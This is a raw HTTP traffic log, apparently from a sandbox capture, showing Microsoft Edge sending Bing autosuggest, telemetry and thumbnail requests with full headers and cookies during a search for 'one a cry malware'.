Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A1%2C%20%5C%22GL%5C%22%3A5%2C%20%5C%22IG%5C%22%3A%5C%22CD5043C961D9403DAF8CB01A2071EE5B%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1729199050539%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awa%2Ci%3A19%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199050728%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awa%2Ci%3A18%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199050751%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awa%2Ci%3A18%22%2C%22AsResponseLength%22%3A%222166%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199050831%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awa%2Ci%3A18%2Cig%3A33E96827282B4546B9B3227F23F71B76%22%2C%22AnswerInfo%22%3A%22MB%3B8%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199050832%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awa%2Ci%3A18%22%2C%22T%22%3A%22CI.GhostingLatency%22%2C%22TS%22%3A1729199050833%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A2%2C%20%5C%22GL%5C%22%3A6%2C%20%5C%22IG%5C%22%3A%5C%2233E96827282B4546B9B3227F23F71B76%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1729199050833%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awan%2Ci%3A20%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199051303%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awan%2Ci%3A19%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199051325%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 6296
date: Thu, 17 Oct 2024 21:04:12 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199052.1491b97e
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=wann&cp=4&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=wann&cp=4&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
x-autosuggest-contentwidth: 976
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 6379
date: Thu, 17 Oct 2024 21:04:12 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199052.1491b97d
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=wanna&cp=5&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=wanna&cp=5&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
x-autosuggest-contentwidth: 976
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 7409
date: Thu, 17 Oct 2024 21:04:12 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199052.1491b97f
GET

https://www.bing.com/th?id=OSK.cc7e2c4b2380eb36e4d622ea8769e012&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /th?id=OSK.cc7e2c4b2380eb36e4d622ea8769e012&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 6671
date: Thu, 17 Oct 2024 21:04:12 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199052.1491b980
GET

https://www.bing.com/th?id=OSK.91cd78945a6ebdb7cff5924bcab3c8b6&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /th?id=OSK.91cd78945a6ebdb7cff5924bcab3c8b6&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 8634
date: Thu, 17 Oct 2024 21:04:12 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199052.1491b981
GET

https://www.bing.com/th?id=OSK.9d2e98f3e4389f11d1683aac3aeb9d03&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /th?id=OSK.9d2e98f3e4389f11d1683aac3aeb9d03&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 5850
date: Thu, 17 Oct 2024 21:04:12 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199052.1491b982
GET

https://www.bing.com/th?id=OSK.80089752fde30d719a2040c42d106e78&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /th?id=OSK.80089752fde30d719a2040c42d106e78&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
